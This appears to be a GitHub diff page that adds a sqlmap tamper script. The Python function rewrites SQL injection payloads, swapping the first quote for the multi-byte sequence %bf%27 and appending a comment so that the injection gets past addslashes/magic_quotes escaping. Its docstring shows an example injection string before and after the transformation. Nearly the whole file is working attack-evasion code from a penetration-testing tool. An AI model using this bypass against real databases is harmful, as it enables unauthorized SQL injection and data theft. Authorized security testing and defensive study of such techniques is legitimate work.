File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 1+ #!/usr/bin/env python
2+
3+ """
4+ $Id$
5+
6+ Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
7+ See the file 'doc/COPYING' for copying permission
8+ """
9+
10+ import re
11+ import os
12+ import random
13+
14+ from lib .core .common import singleTimeWarnMessage
15+ from lib .core .enums import DBMS
16+ from lib .core .enums import PRIORITY
17+
18+ __priority__ = PRIORITY .NORMAL
19+
20+ def dependencies ():
21+ pass
22+
23+ def tamper (payload ):
24+ """
25+ Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
26+
27+ Example:
28+ * Input: 1' AND 1=1
29+ * Output: 1%bf%27 AND 1=1--%20
30+
31+ Notes:
32+ * Useful for bypassing magic_quotes/addslashes feature
33+
34+ Reference:
35+ * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
36+ """
37+
38+ retVal = payload
39+
40+ if payload :
41+ found = False
42+ retVal = ""
43+
44+ for i in xrange (len (payload )):
45+ if payload [i ] == '\' ' and not found :
46+ retVal += "%bf%27"
47+ found = True
48+ else :
49+ retVal += payload [i ]
50+ continue
51+
52+ if found :
53+ retVal = re .sub ("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*" , "" , retVal )
54+ retVal += "-- "
55+
56+ return retVal
You can’t perform that action at this time.
0 commit comments